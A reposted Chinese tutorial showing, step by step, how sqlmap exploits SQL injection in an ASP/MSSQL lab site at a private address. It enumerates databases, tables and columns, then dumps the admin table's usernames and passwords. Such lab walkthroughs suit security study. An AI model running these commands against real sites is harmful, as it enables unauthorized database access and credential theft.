公告：魔扣目錄網為廣大站長提供免費收錄網站服務，提交前請做好本站友鏈：【網站目錄：http://www.ylptlb.cn 】，免友鏈快審服務（50元/站），

實戰黑客sqlmap滲透攻擊mssql數據庫最新教程1.判斷注入點及獲取網站信息：2.獲取所有數據庫：3.獲取網站當前使用的數據庫：4.獲取數據庫中的表名：5.獲取數據表中的字段名：6.獲取字段中的內

發布時間：2023-07-03 14:18:04 作者：網友整理

今天搭建了一個asp+mssql數據庫的環境用于安全測試學習

1.判斷注入點及獲取網站信息：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: windows 2003 or XP

web Application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs

網站用的數據庫是這個sqlZR

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧，幾條命名就把管理員的賬號密碼給跑出來了。

分享到：

標簽：滲透攻擊

網友整理

注冊時間：

網站：5 個小程序：0 個文章：12 篇

文章分類

熱門網站

數獨一種數學游戲，玩家需要根據9

您可以通過答題星輕松地創建試卷

各種考試題，題庫，初中，高中，大學四六

記錄運動步數，積累氧氣值。還可偷

每日養生,天天健康

通用課目體育訓練成績評定